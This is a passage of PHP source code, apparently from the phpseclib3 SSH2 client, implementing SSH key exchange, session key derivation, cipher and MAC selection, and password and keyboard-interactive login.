implode(', ', $ext) . ')'; } return $identifier; } /** * Key Exchange * * @return bool * @param string|bool $kexinit_payload_server optional * @throws \UnexpectedValueException on receipt of unexpected packets * @throws \RuntimeException on other errors * @throws \phpseclib3\Exception\NoSupportedAlgorithmsException when none of the algorithms phpseclib has loaded are compatible */ private function key_exchange($kexinit_payload_server = false) { $preferred = $this->preferred; $send_kex = true; $kex_algorithms = isset($preferred['kex']) ? $preferred['kex'] : SSH2::getSupportedKEXAlgorithms(); $server_host_key_algorithms = isset($preferred['hostkey']) ? $preferred['hostkey'] : SSH2::getSupportedHostKeyAlgorithms(); $s2c_encryption_algorithms = isset($preferred['server_to_client']['crypt']) ? $preferred['server_to_client']['crypt'] : SSH2::getSupportedEncryptionAlgorithms(); $c2s_encryption_algorithms = isset($preferred['client_to_server']['crypt']) ? $preferred['client_to_server']['crypt'] : SSH2::getSupportedEncryptionAlgorithms(); $s2c_mac_algorithms = isset($preferred['server_to_client']['mac']) ? $preferred['server_to_client']['mac'] : SSH2::getSupportedMACAlgorithms(); $c2s_mac_algorithms = isset($preferred['client_to_server']['mac']) ? $preferred['client_to_server']['mac'] : SSH2::getSupportedMACAlgorithms(); $s2c_compression_algorithms = isset($preferred['server_to_client']['comp']) ? $preferred['server_to_client']['comp'] : SSH2::getSupportedCompressionAlgorithms(); $c2s_compression_algorithms = isset($preferred['client_to_server']['comp']) ? $preferred['client_to_server']['comp'] : SSH2::getSupportedCompressionAlgorithms(); $kex_algorithms = array_merge($kex_algorithms, ['ext-info-c', 'kex-strict-c-v00@openssh.com']); // some SSH servers have buggy implementations of some of the above algorithms switch (true) { case $this->server_identifier == 'SSH-2.0-SSHD': case substr($this->server_identifier, 0, 13) == 'SSH-2.0-DLINK': if (!isset($preferred['server_to_client']['mac'])) { $s2c_mac_algorithms = array_values(array_diff( $s2c_mac_algorithms, ['hmac-sha1-96', 'hmac-md5-96'] )); } if (!isset($preferred['client_to_server']['mac'])) { $c2s_mac_algorithms = array_values(array_diff( $c2s_mac_algorithms, ['hmac-sha1-96', 'hmac-md5-96'] )); } break; case substr($this->server_identifier, 0, 24) == 'SSH-2.0-TurboFTP_SERVER_': if (!isset($preferred['server_to_client']['crypt'])) { $s2c_encryption_algorithms = array_values(array_diff( $s2c_encryption_algorithms, ['aes128-gcm@openssh.com', 'aes256-gcm@openssh.com'] )); } if (!isset($preferred['client_to_server']['crypt'])) { $c2s_encryption_algorithms = array_values(array_diff( $c2s_encryption_algorithms, ['aes128-gcm@openssh.com', 'aes256-gcm@openssh.com'] )); } } $client_cookie = Random::string(16); $kexinit_payload_client = pack('Ca*', NET_SSH2_MSG_KEXINIT, $client_cookie); $kexinit_payload_client .= Strings::packSSH2( 'L10bN', $kex_algorithms, $server_host_key_algorithms, $c2s_encryption_algorithms, $s2c_encryption_algorithms, $c2s_mac_algorithms, $s2c_mac_algorithms, $c2s_compression_algorithms, $s2c_compression_algorithms, [], // language, client to server [], // language, server to client false, // first_kex_packet_follows 0 // reserved for future extension ); if ($kexinit_payload_server === false) { $this->send_binary_packet($kexinit_payload_client); $this->extra_packets = 0; $kexinit_payload_server = $this->get_binary_packet(); if ( is_bool($kexinit_payload_server) || !strlen($kexinit_payload_server) || ord($kexinit_payload_server[0]) != NET_SSH2_MSG_KEXINIT ) { $this->disconnect_helper(NET_SSH2_DISCONNECT_PROTOCOL_ERROR); throw new \UnexpectedValueException('Expected SSH_MSG_KEXINIT'); } $send_kex = false; } $response = $kexinit_payload_server; Strings::shift($response, 1); // skip past the message number (it should be SSH_MSG_KEXINIT) $server_cookie = Strings::shift($response, 16); list( $this->kex_algorithms, $this->server_host_key_algorithms, $this->encryption_algorithms_client_to_server, $this->encryption_algorithms_server_to_client, $this->mac_algorithms_client_to_server, $this->mac_algorithms_server_to_client, $this->compression_algorithms_client_to_server, $this->compression_algorithms_server_to_client, $this->languages_client_to_server, $this->languages_server_to_client, $first_kex_packet_follows ) = Strings::unpackSSH2('L10C', $response); if (in_array('kex-strict-s-v00@openssh.com', $this->kex_algorithms)) { if ($this->session_id === false && $this->extra_packets) { throw new \UnexpectedValueException('Possible Terrapin Attack detected'); } } $this->supported_private_key_algorithms = $this->server_host_key_algorithms; if ($send_kex) { $this->send_binary_packet($kexinit_payload_client); } // we need to decide upon the symmetric encryption algorithms before we do the diffie-hellman key exchange // we don't initialize any crypto-objects, yet - we do that, later. for now, we need the lengths to make the // diffie-hellman key exchange as fast as possible $decrypt = self::array_intersect_first($s2c_encryption_algorithms, $this->encryption_algorithms_server_to_client); $decryptKeyLength = $this->encryption_algorithm_to_key_size($decrypt); if ($decryptKeyLength === null) { $this->disconnect_helper(NET_SSH2_DISCONNECT_KEY_EXCHANGE_FAILED); throw new NoSupportedAlgorithmsException('No compatible server to client encryption algorithms found'); } $encrypt = self::array_intersect_first($c2s_encryption_algorithms, $this->encryption_algorithms_client_to_server); $encryptKeyLength = $this->encryption_algorithm_to_key_size($encrypt); if ($encryptKeyLength === null) { $this->disconnect_helper(NET_SSH2_DISCONNECT_KEY_EXCHANGE_FAILED); throw new NoSupportedAlgorithmsException('No compatible client to server encryption algorithms found'); } // through diffie-hellman key exchange a symmetric key is obtained $this->kex_algorithm = self::array_intersect_first($kex_algorithms, $this->kex_algorithms); if ($this->kex_algorithm === false) { $this->disconnect_helper(NET_SSH2_DISCONNECT_KEY_EXCHANGE_FAILED); throw new NoSupportedAlgorithmsException('No compatible key exchange algorithms found'); } $server_host_key_algorithm = self::array_intersect_first($server_host_key_algorithms, $this->server_host_key_algorithms); if ($server_host_key_algorithm === false) { $this->disconnect_helper(NET_SSH2_DISCONNECT_KEY_EXCHANGE_FAILED); throw new NoSupportedAlgorithmsException('No compatible server host key algorithms found'); } $mac_algorithm_out = self::array_intersect_first($c2s_mac_algorithms, $this->mac_algorithms_client_to_server); if ($mac_algorithm_out === false) { $this->disconnect_helper(NET_SSH2_DISCONNECT_KEY_EXCHANGE_FAILED); throw new NoSupportedAlgorithmsException('No compatible client to server message authentication algorithms found'); } $mac_algorithm_in = self::array_intersect_first($s2c_mac_algorithms, $this->mac_algorithms_server_to_client); if ($mac_algorithm_in === false) { $this->disconnect_helper(NET_SSH2_DISCONNECT_KEY_EXCHANGE_FAILED); throw new NoSupportedAlgorithmsException('No compatible server to client message authentication algorithms found'); } $compression_map = [ 'none' => self::NET_SSH2_COMPRESSION_NONE, 'zlib' => self::NET_SSH2_COMPRESSION_ZLIB, 'zlib@openssh.com' => self::NET_SSH2_COMPRESSION_ZLIB_AT_OPENSSH ]; $compression_algorithm_in = self::array_intersect_first($s2c_compression_algorithms, $this->compression_algorithms_server_to_client); if ($compression_algorithm_in === false) { $this->disconnect_helper(NET_SSH2_DISCONNECT_KEY_EXCHANGE_FAILED); throw new NoSupportedAlgorithmsException('No compatible server to client compression algorithms found'); } $this->decompress = $compression_map[$compression_algorithm_in]; $compression_algorithm_out = self::array_intersect_first($c2s_compression_algorithms, $this->compression_algorithms_client_to_server); if ($compression_algorithm_out === false) { $this->disconnect_helper(NET_SSH2_DISCONNECT_KEY_EXCHANGE_FAILED); throw new NoSupportedAlgorithmsException('No compatible client to server compression algorithms found'); } $this->compress = $compression_map[$compression_algorithm_out]; switch ($this->kex_algorithm) { case 'diffie-hellman-group15-sha512': case 'diffie-hellman-group16-sha512': case 'diffie-hellman-group17-sha512': case 'diffie-hellman-group18-sha512': case 'ecdh-sha2-nistp521': $kexHash = new Hash('sha512'); break; case 'ecdh-sha2-nistp384': $kexHash = new Hash('sha384'); break; case 'diffie-hellman-group-exchange-sha256': case 'diffie-hellman-group14-sha256': case 'ecdh-sha2-nistp256': case 'curve25519-sha256@libssh.org': case 'curve25519-sha256': $kexHash = new Hash('sha256'); break; default: $kexHash = new Hash('sha1'); } // Only relevant in diffie-hellman-group-exchange-sha{1,256}, otherwise empty. $exchange_hash_rfc4419 = ''; if (strpos($this->kex_algorithm, 'curve25519-sha256') === 0 || strpos($this->kex_algorithm, 'ecdh-sha2-nistp') === 0) { $curve = strpos($this->kex_algorithm, 'curve25519-sha256') === 0 ? 'Curve25519' : substr($this->kex_algorithm, 10); $ourPrivate = EC::createKey($curve); $ourPublicBytes = $ourPrivate->getPublicKey()->getEncodedCoordinates(); $clientKexInitMessage = 'NET_SSH2_MSG_KEX_ECDH_INIT'; $serverKexReplyMessage = 'NET_SSH2_MSG_KEX_ECDH_REPLY'; } else { if (strpos($this->kex_algorithm, 'diffie-hellman-group-exchange') === 0) { $dh_group_sizes_packed = pack( 'NNN', $this->kex_dh_group_size_min, $this->kex_dh_group_size_preferred, $this->kex_dh_group_size_max ); $packet = pack( 'Ca*', NET_SSH2_MSG_KEXDH_GEX_REQUEST, $dh_group_sizes_packed ); $this->send_binary_packet($packet); $this->updateLogHistory('UNKNOWN (34)', 'NET_SSH2_MSG_KEXDH_GEX_REQUEST'); $response = $this->get_binary_packet(); list($type, $primeBytes, $gBytes) = Strings::unpackSSH2('Css', $response); if ($type != NET_SSH2_MSG_KEXDH_GEX_GROUP) { $this->disconnect_helper(NET_SSH2_DISCONNECT_PROTOCOL_ERROR); throw new \UnexpectedValueException('Expected SSH_MSG_KEX_DH_GEX_GROUP'); } $this->updateLogHistory('NET_SSH2_MSG_KEXDH_REPLY', 'NET_SSH2_MSG_KEXDH_GEX_GROUP'); $prime = new BigInteger($primeBytes, -256); $g = new BigInteger($gBytes, -256); $exchange_hash_rfc4419 = $dh_group_sizes_packed . Strings::packSSH2( 'ss', $primeBytes, $gBytes ); $params = DH::createParameters($prime, $g); $clientKexInitMessage = 'NET_SSH2_MSG_KEXDH_GEX_INIT'; $serverKexReplyMessage = 'NET_SSH2_MSG_KEXDH_GEX_REPLY'; } else { $params = DH::createParameters($this->kex_algorithm); $clientKexInitMessage = 'NET_SSH2_MSG_KEXDH_INIT'; $serverKexReplyMessage = 'NET_SSH2_MSG_KEXDH_REPLY'; } $keyLength = min($kexHash->getLengthInBytes(), max($encryptKeyLength, $decryptKeyLength)); $ourPrivate = DH::createKey($params, 16 * $keyLength); // 2 * 8 * $keyLength $ourPublic = $ourPrivate->getPublicKey()->toBigInteger(); $ourPublicBytes = $ourPublic->toBytes(true); } $data = pack('CNa*', constant($clientKexInitMessage), strlen($ourPublicBytes), $ourPublicBytes); $this->send_binary_packet($data); switch ($clientKexInitMessage) { case 'NET_SSH2_MSG_KEX_ECDH_INIT': $this->updateLogHistory('NET_SSH2_MSG_KEXDH_INIT', 'NET_SSH2_MSG_KEX_ECDH_INIT'); break; case 'NET_SSH2_MSG_KEXDH_GEX_INIT': $this->updateLogHistory('UNKNOWN (32)', 'NET_SSH2_MSG_KEXDH_GEX_INIT'); } $response = $this->get_binary_packet(); list( $type, $server_public_host_key, $theirPublicBytes, $this->signature ) = Strings::unpackSSH2('Csss', $response); if ($type != constant($serverKexReplyMessage)) { $this->disconnect_helper(NET_SSH2_DISCONNECT_PROTOCOL_ERROR); throw new \UnexpectedValueException("Expected $serverKexReplyMessage"); } switch ($serverKexReplyMessage) { case 'NET_SSH2_MSG_KEX_ECDH_REPLY': $this->updateLogHistory('NET_SSH2_MSG_KEXDH_REPLY', 'NET_SSH2_MSG_KEX_ECDH_REPLY'); break; case 'NET_SSH2_MSG_KEXDH_GEX_REPLY': $this->updateLogHistory('UNKNOWN (33)', 'NET_SSH2_MSG_KEXDH_GEX_REPLY'); } $this->server_public_host_key = $server_public_host_key; list($public_key_format) = Strings::unpackSSH2('s', $server_public_host_key); if (strlen($this->signature) < 4) { throw new \LengthException('The signature needs at least four bytes'); } $temp = unpack('Nlength', substr($this->signature, 0, 4)); $this->signature_format = substr($this->signature, 4, $temp['length']); $keyBytes = DH::computeSecret($ourPrivate, $theirPublicBytes); if (($keyBytes & "\xFF\x80") === "\x00\x00") { $keyBytes = substr($keyBytes, 1); } elseif (($keyBytes[0] & "\x80") === "\x80") { $keyBytes = "\0$keyBytes"; } $this->exchange_hash = Strings::packSSH2( 's5', $this->identifier, $this->server_identifier, $kexinit_payload_client, $kexinit_payload_server, $this->server_public_host_key ); $this->exchange_hash .= $exchange_hash_rfc4419; $this->exchange_hash .= Strings::packSSH2( 's3', $ourPublicBytes, $theirPublicBytes, $keyBytes ); $this->exchange_hash = $kexHash->hash($this->exchange_hash); if ($this->session_id === false) { $this->session_id = $this->exchange_hash; } switch ($server_host_key_algorithm) { case 'rsa-sha2-256': case 'rsa-sha2-512': //case 'ssh-rsa': $expected_key_format = 'ssh-rsa'; break; default: $expected_key_format = $server_host_key_algorithm; } if ($public_key_format != $expected_key_format || $this->signature_format != $server_host_key_algorithm) { switch (true) { case $this->signature_format == $server_host_key_algorithm: case $server_host_key_algorithm != 'rsa-sha2-256' && $server_host_key_algorithm != 'rsa-sha2-512': case $this->signature_format != 'ssh-rsa': $this->disconnect_helper(NET_SSH2_DISCONNECT_HOST_KEY_NOT_VERIFIABLE); throw new \RuntimeException('Server Host Key Algorithm Mismatch (' . $this->signature_format . ' vs ' . $server_host_key_algorithm . ')'); } } $packet = pack('C', NET_SSH2_MSG_NEWKEYS); $this->send_binary_packet($packet); $response = $this->get_binary_packet(); if ($response === false) { $this->disconnect_helper(NET_SSH2_DISCONNECT_CONNECTION_LOST); throw new ConnectionClosedException('Connection closed by server'); } list($type) = Strings::unpackSSH2('C', $response); if ($type != NET_SSH2_MSG_NEWKEYS) { $this->disconnect_helper(NET_SSH2_DISCONNECT_PROTOCOL_ERROR); throw new \UnexpectedValueException('Expected SSH_MSG_NEWKEYS'); } if (in_array('kex-strict-s-v00@openssh.com', $this->kex_algorithms)) { $this->get_seq_no = $this->send_seq_no = 0; } $keyBytes = pack('Na*', strlen($keyBytes), $keyBytes); $this->encrypt = self::encryption_algorithm_to_crypt_instance($encrypt); if ($this->encrypt) { if (self::$crypto_engine) { $this->encrypt->setPreferredEngine(self::$crypto_engine); } if ($this->encrypt->getBlockLengthInBytes()) { $this->encrypt_block_size = $this->encrypt->getBlockLengthInBytes(); } $this->encrypt->disablePadding(); if ($this->encrypt->usesIV()) { $iv = $kexHash->hash($keyBytes . $this->exchange_hash . 'A' . $this->session_id); while ($this->encrypt_block_size > strlen($iv)) { $iv .= $kexHash->hash($keyBytes . $this->exchange_hash . $iv); } $this->encrypt->setIV(substr($iv, 0, $this->encrypt_block_size)); } switch ($encrypt) { case 'aes128-gcm@openssh.com': case 'aes256-gcm@openssh.com': $nonce = $kexHash->hash($keyBytes . $this->exchange_hash . 'A' . $this->session_id); $this->encryptFixedPart = substr($nonce, 0, 4); $this->encryptInvocationCounter = substr($nonce, 4, 8); // fall-through case 'chacha20-poly1305@openssh.com': break; default: $this->encrypt->enableContinuousBuffer(); } $key = $kexHash->hash($keyBytes . $this->exchange_hash . 'C' . $this->session_id); while ($encryptKeyLength > strlen($key)) { $key .= $kexHash->hash($keyBytes . $this->exchange_hash . $key); } switch ($encrypt) { case 'chacha20-poly1305@openssh.com': $encryptKeyLength = 32; $this->lengthEncrypt = self::encryption_algorithm_to_crypt_instance($encrypt); $this->lengthEncrypt->setKey(substr($key, 32, 32)); } $this->encrypt->setKey(substr($key, 0, $encryptKeyLength)); $this->encryptName = $encrypt; } $this->decrypt = self::encryption_algorithm_to_crypt_instance($decrypt); if ($this->decrypt) { if (self::$crypto_engine) { $this->decrypt->setPreferredEngine(self::$crypto_engine); } if ($this->decrypt->getBlockLengthInBytes()) { $this->decrypt_block_size = $this->decrypt->getBlockLengthInBytes(); } $this->decrypt->disablePadding(); if ($this->decrypt->usesIV()) { $iv = $kexHash->hash($keyBytes . $this->exchange_hash . 'B' . $this->session_id); while ($this->decrypt_block_size > strlen($iv)) { $iv .= $kexHash->hash($keyBytes . $this->exchange_hash . $iv); } $this->decrypt->setIV(substr($iv, 0, $this->decrypt_block_size)); } switch ($decrypt) { case 'aes128-gcm@openssh.com': case 'aes256-gcm@openssh.com': // see https://tools.ietf.org/html/rfc5647#section-7.1 $nonce = $kexHash->hash($keyBytes . $this->exchange_hash . 'B' . $this->session_id); $this->decryptFixedPart = substr($nonce, 0, 4); $this->decryptInvocationCounter = substr($nonce, 4, 8); // fall-through case 'chacha20-poly1305@openssh.com': break; default: $this->decrypt->enableContinuousBuffer(); } $key = $kexHash->hash($keyBytes . $this->exchange_hash . 'D' . $this->session_id); while ($decryptKeyLength > strlen($key)) { $key .= $kexHash->hash($keyBytes . $this->exchange_hash . $key); } switch ($decrypt) { case 'chacha20-poly1305@openssh.com': $decryptKeyLength = 32; $this->lengthDecrypt = self::encryption_algorithm_to_crypt_instance($decrypt); $this->lengthDecrypt->setKey(substr($key, 32, 32)); } $this->decrypt->setKey(substr($key, 0, $decryptKeyLength)); $this->decryptName = $decrypt; } /* The "arcfour128" algorithm is the RC4 cipher, as described in [SCHNEIER], using a 128-bit key. The first 1536 bytes of keystream generated by the cipher MUST be discarded, and the first byte of the first encrypted packet MUST be encrypted using the 1537th byte of keystream. -- http://tools.ietf.org/html/rfc4345#section-4 */ if ($encrypt == 'arcfour128' || $encrypt == 'arcfour256') { $this->encrypt->encrypt(str_repeat("\0", 1536)); } if ($decrypt == 'arcfour128' || $decrypt == 'arcfour256') { $this->decrypt->decrypt(str_repeat("\0", 1536)); } if (!$this->encrypt->usesNonce()) { list($this->hmac_create, $createKeyLength) = self::mac_algorithm_to_hash_instance($mac_algorithm_out); } else { $this->hmac_create = new \stdClass(); $this->hmac_create_name = $mac_algorithm_out; //$mac_algorithm_out = 'none'; $createKeyLength = 0; } if ($this->hmac_create instanceof Hash) { $key = $kexHash->hash($keyBytes . $this->exchange_hash . 'E' . $this->session_id); while ($createKeyLength > strlen($key)) { $key .= $kexHash->hash($keyBytes . $this->exchange_hash . $key); } $this->hmac_create->setKey(substr($key, 0, $createKeyLength)); $this->hmac_create_name = $mac_algorithm_out; $this->hmac_create_etm = preg_match('#-etm@openssh\.com$#', $mac_algorithm_out); } if (!$this->decrypt->usesNonce()) { list($this->hmac_check, $checkKeyLength) = self::mac_algorithm_to_hash_instance($mac_algorithm_in); $this->hmac_size = $this->hmac_check->getLengthInBytes(); } else { $this->hmac_check = new \stdClass(); $this->hmac_check_name = $mac_algorithm_in; //$mac_algorithm_in = 'none'; $checkKeyLength = 0; $this->hmac_size = 0; } if ($this->hmac_check instanceof Hash) { $key = $kexHash->hash($keyBytes . $this->exchange_hash . 'F' . $this->session_id); while ($checkKeyLength > strlen($key)) { $key .= $kexHash->hash($keyBytes . $this->exchange_hash . $key); } $this->hmac_check->setKey(substr($key, 0, $checkKeyLength)); $this->hmac_check_name = $mac_algorithm_in; $this->hmac_check_etm = preg_match('#-etm@openssh\.com$#', $mac_algorithm_in); } $this->regenerate_compression_context = $this->regenerate_decompression_context = true; return true; } /** * Maps an encryption algorithm name to the number of key bytes. * * @param string $algorithm Name of the encryption algorithm * @return int|null Number of bytes as an integer or null for unknown */ private function encryption_algorithm_to_key_size($algorithm) { if ($this->bad_key_size_fix && self::bad_algorithm_candidate($algorithm)) { return 16; } switch ($algorithm) { case 'none': return 0; case 'aes128-gcm@openssh.com': case 'aes128-cbc': case 'aes128-ctr': case 'arcfour': case 'arcfour128': case 'blowfish-cbc': case 'blowfish-ctr': case 'twofish128-cbc': case 'twofish128-ctr': return 16; case '3des-cbc': case '3des-ctr': case 'aes192-cbc': case 'aes192-ctr': case 'twofish192-cbc': case 'twofish192-ctr': return 24; case 'aes256-gcm@openssh.com': case 'aes256-cbc': case 'aes256-ctr': case 'arcfour256': case 'twofish-cbc': case 'twofish256-cbc': case 'twofish256-ctr': return 32; case 'chacha20-poly1305@openssh.com': return 64; } return null; } /** * Maps an encryption algorithm name to an instance of a subclass of * \phpseclib3\Crypt\Common\SymmetricKey. * * @param string $algorithm Name of the encryption algorithm * @return SymmetricKey|null */ private static function encryption_algorithm_to_crypt_instance($algorithm) { switch ($algorithm) { case '3des-cbc': return new TripleDES('cbc'); case '3des-ctr': return new TripleDES('ctr'); case 'aes256-cbc': case 'aes192-cbc': case 'aes128-cbc': return new Rijndael('cbc'); case 'aes256-ctr': case 'aes192-ctr': case 'aes128-ctr': return new Rijndael('ctr'); case 'blowfish-cbc': return new Blowfish('cbc'); case 'blowfish-ctr': return new Blowfish('ctr'); case 'twofish128-cbc': case 'twofish192-cbc': case 'twofish256-cbc': case 'twofish-cbc': return new Twofish('cbc'); case 'twofish128-ctr': case 'twofish192-ctr': case 'twofish256-ctr': return new Twofish('ctr'); case 'arcfour': case 'arcfour128': case 'arcfour256': return new RC4(); case 'aes128-gcm@openssh.com': case 'aes256-gcm@openssh.com': return new Rijndael('gcm'); case 'chacha20-poly1305@openssh.com': return new ChaCha20(); } return null; } /** * Maps an encryption algorithm name to an instance of a subclass of * \phpseclib3\Crypt\Hash. * * @param string $algorithm Name of the encryption algorithm * @return array{Hash, int}|null */ private static function mac_algorithm_to_hash_instance($algorithm) { switch ($algorithm) { case 'umac-64@openssh.com': case 'umac-64-etm@openssh.com': return [new Hash('umac-64'), 16]; case 'umac-128@openssh.com': case 'umac-128-etm@openssh.com': return [new Hash('umac-128'), 16]; case 'hmac-sha2-512': case 'hmac-sha2-512-etm@openssh.com': return [new Hash('sha512'), 64]; case 'hmac-sha2-256': case 'hmac-sha2-256-etm@openssh.com': return [new Hash('sha256'), 32]; case 'hmac-sha1': case 'hmac-sha1-etm@openssh.com': return [new Hash('sha1'), 20]; case 'hmac-sha1-96': return [new Hash('sha1-96'), 20]; case 'hmac-md5': return [new Hash('md5'), 16]; case 'hmac-md5-96': return [new Hash('md5-96'), 16]; } } /* * Tests whether or not proposed algorithm has a potential for issues * * @link https://www.chiark.greenend.org.uk/~sgtatham/putty/wishlist/ssh2-aesctr-openssh.html * @link https://bugzilla.mindrot.org/show_bug.cgi?id=1291 * @param string $algorithm Name of the encryption algorithm * @return bool */ private static function bad_algorithm_candidate($algorithm) { switch ($algorithm) { case 'arcfour256': case 'aes192-ctr': case 'aes256-ctr': return true; } return false; } /** * Login * * The $password parameter can be a plaintext password, a \phpseclib3\Crypt\RSA|EC|DSA object, a \phpseclib3\System\SSH\Agent object or an array * * @param string $username * @param string|PrivateKey|array[]|Agent|null ...$args * @return bool * @see self::_login() */ public function login($username, ...$args) { if (!$this->retry_connect) { $this->auth[] = func_get_args(); } // try logging with 'none' as an authentication method first since that's what // PuTTY does if (substr($this->server_identifier, 0, 15) != 'SSH-2.0-CoreFTP' && $this->auth_methods_to_continue === null) { if ($this->sublogin($username)) { return true; } if (!count($args)) { return false; } } return $this->sublogin($username, ...$args); } /** * Login Helper * * @param string $username * @param string|PrivateKey|array[]|Agent|null ...$args * @return bool * @see self::_login_helper() */ protected function sublogin($username, ...$args) { if (!($this->bitmap & self::MASK_CONSTRUCTOR)) { $this->connect(); } if (empty($args)) { return $this->login_helper($username); } foreach ($args as $arg) { switch (true) { case $arg instanceof PublicKey: throw new \UnexpectedValueException('A PublicKey object was passed to the login method instead of a PrivateKey object'); case $arg instanceof PrivateKey: case $arg instanceof Agent: case is_array($arg): case Strings::is_stringable($arg): break; default: throw new \UnexpectedValueException('$password needs to either be an instance of \phpseclib3\Crypt\Common\PrivateKey, \System\SSH\Agent, an array or a string'); } } while (count($args)) { if (!$this->auth_methods_to_continue || !$this->smartMFA) { $newargs = $args; $args = []; } else { $newargs = []; foreach ($this->auth_methods_to_continue as $method) { switch ($method) { case 'publickey': foreach ($args as $key => $arg) { if ($arg instanceof PrivateKey || $arg instanceof Agent) { $newargs[] = $arg; unset($args[$key]); break; } } break; case 'keyboard-interactive': $hasArray = $hasString = false; foreach ($args as $arg) { if ($hasArray || is_array($arg)) { $hasArray = true; break; } if ($hasString || Strings::is_stringable($arg)) { $hasString = true; break; } } if ($hasArray && $hasString) { foreach ($args as $key => $arg) { if (is_array($arg)) { $newargs[] = $arg; break 2; } } } // fall-through case 'password': foreach ($args as $key => $arg) { $newargs[] = $arg; unset($args[$key]); break; } } } } if (!count($newargs)) { return false; } foreach ($newargs as $arg) { if ($this->login_helper($username, $arg)) { return true; } } } return false; } /** * Login Helper * * {@internal It might be worthwhile, at some point, to protect against {@link http://tools.ietf.org/html/rfc4251#section-9.3.9 traffic analysis} * by sending dummy SSH_MSG_IGNORE messages.} * * @param string $username * @param string|AsymmetricKey|array[]|Agent|null ...$args * @return bool * @throws \UnexpectedValueException on receipt of unexpected packets * @throws \RuntimeException on other errors */ private function login_helper($username, $password = null) { if (!($this->bitmap & self::MASK_CONNECTED)) { return false; } if (!($this->bitmap & self::MASK_LOGIN_REQ)) { $packet = Strings::packSSH2('Cs', NET_SSH2_MSG_SERVICE_REQUEST, 'ssh-userauth'); $this->send_binary_packet($packet); try { $response = $this->get_binary_packet(); } catch (\Exception $e) { if ($this->retry_connect) { $this->retry_connect = false; $this->connect(); return $this->login_helper($username, $password); } $this->disconnect_helper(NET_SSH2_DISCONNECT_CONNECTION_LOST); throw $e; } list($type) = Strings::unpackSSH2('C', $response); if ($type == NET_SSH2_MSG_EXT_INFO) { list($nr_extensions) = Strings::unpackSSH2('N', $response); for ($i = 0; $i < $nr_extensions; $i++) { list($extension_name, $extension_value) = Strings::unpackSSH2('ss', $response); if ($extension_name == 'server-sig-algs') { $this->supported_private_key_algorithms = explode(',', $extension_value); } } $response = $this->get_binary_packet(); list($type) = Strings::unpackSSH2('C', $response); } list($service) = Strings::unpackSSH2('s', $response); if ($type != NET_SSH2_MSG_SERVICE_ACCEPT || $service != 'ssh-userauth') { $this->disconnect_helper(NET_SSH2_DISCONNECT_PROTOCOL_ERROR); throw new \UnexpectedValueException('Expected SSH_MSG_SERVICE_ACCEPT'); } $this->bitmap |= self::MASK_LOGIN_REQ; } if (strlen($this->last_interactive_response)) { return !Strings::is_stringable($password) && !is_array($password) ? false : $this->keyboard_interactive_process($password); } if ($password instanceof PrivateKey) { return $this->privatekey_login($username, $password); } if ($password instanceof Agent) { return $this->ssh_agent_login($username, $password); } if (is_array($password)) { if ($this->keyboard_interactive_login($username, $password)) { $this->bitmap |= self::MASK_LOGIN; return true; } return false; } if (!isset($password)) { $packet = Strings::packSSH2( 'Cs3', NET_SSH2_MSG_USERAUTH_REQUEST, $username, 'ssh-connection', 'none' ); $this->send_binary_packet($packet); $response = $this->get_binary_packet(); list($type) = Strings::unpackSSH2('C', $response); switch ($type) { case NET_SSH2_MSG_USERAUTH_SUCCESS: $this->bitmap |= self::MASK_LOGIN; return true; case NET_SSH2_MSG_USERAUTH_FAILURE: list($auth_methods) = Strings::unpackSSH2('L', $response); $this->auth_methods_to_continue = $auth_methods; // fall-through default: return false; } } $packet = Strings::packSSH2( 'Cs3bs', NET_SSH2_MSG_USERAUTH_REQUEST, $username, 'ssh-connection', 'password', false, $password ); // remove the username and password from the logged packet if (!defined('NET_SSH2_LOGGING')) { $logged = null; } else { $logged = Strings::packSSH2( 'Cs3bs', NET_SSH2_MSG_USERAUTH_REQUEST, $username, 'ssh-connection', 'password', false, 'password' ); } $this->send_binary_packet($packet, $logged); $response = $this->get_binary_packet(); if ($response === false) { return false; } list($type) = Strings::unpackSSH2('C', $response); switch ($type) { case NET_SSH2_MSG_USERAUTH_PASSWD_CHANGEREQ: // in theory, the password can be changed $this->updateLogHistory('UNKNOWN (60)', 'NET_SSH2_MSG_USERAUTH_PASSWD_CHANGEREQ'); list($message) = Strings::unpackSSH2('s', $response); $this->errors[] = 'SSH_MSG_USERAUTH_PASSWD_CHANGEREQ: ' . $message; return $this->disconnect_helper(NET_SSH2_DISCONNECT_AUTH_CANCELLED_BY_USER); case NET_SSH2_MSG_USERAUTH_FAILURE: // can we use keyboard-interactive authentication? if not then either the login is bad or the server employees // multi-factor authentication list($auth_methods, $partial_success) = Strings::unpackSSH2('Lb', $response); $this->auth_methods_to_continue = $auth_methods; if (!$partial_success && in_array('keyboard-interactive', $auth_methods)) { if ($this->keyboard_interactive_login($username, $password)) { $this->bitmap |= self::MASK_LOGIN; return true; } return false; } return false; case NET_SSH2_MSG_USERAUTH_SUCCESS: $this->bitmap |= self::MASK_LOGIN; return true; } return false; } /** * Login via keyboard-interactive authentication * * See {@link http://tools.ietf.org/html/rfc4256 RFC4256} for details. This is not a full-featured keyboard-interactive authenticator. * * @param string $username * @param string|array $password * @return bool */ private function keyboard_interactive_login($username, $password) { $packet = Strings::packSSH2( 'Cs5', NET_SSH2_MSG_USERAUTH_REQUEST, $username, 'ssh-connection', 'keyboard-interactive', '', // language tag '' // submethods ); $this->send_binary_packet($packet); return $this->keyboard_interactive_process($password); } /** * Handle the keyboard-interactive requests / responses. * * @param string|array ...$responses * @return bool * @throws \RuntimeException on connection error */ private function keyboard_interactive_process(...$responses) { if (strlen($this->last_interactive_response)) { $response = $this->last_interactive_response; } else { $orig = $response = $this->get_binary_packet(); } list($type) = Strings::unpackSSH2('C', $response); switch ($type) { case NET_SSH2_MSG_USERAUTH_INFO_REQUEST: list( , // name; may be empty , // instruction; may be empty , // language tag; may be empty $num_prompts ) = Strings::unpackSSH2('s3N', $response); for ($i = 0; $i < count($responses); $i++) { if (is_array($responses[$i])) { foreach ($responses[$i] as $key => $value) { $this->keyboard_requests_responses[$key] = $value; } unset($responses[$i]); } } $responses = array_values($responses); if (isset($this->keyboard_requests_responses)) { for ($i = 0; $i < $num_prompts; $i++) { list( $prompt, // prompt - ie. "Password: "; must not be empty // echo ) = Strings::unpackSSH2('sC', $response); foreach ($this->keyboard_requests_responses as $key => $value) { if (substr($prompt, 0, strlen($key)) == $key) { $responses[] = $value; break; } } } } // see http://tools.ietf.org/html/rfc4256#section-3.2 if (strlen($this->last_interactive_response)) { $this->last_interactive_response = ''; } else { $this->updateLogHistory('UNKNOWN (60)', 'NET_SSH2_MSG_USERAUTH_INFO_REQUEST'); } if (!count($responses) && $num_prompts) { $this->last_interactive_response = $orig; return false; } /* After 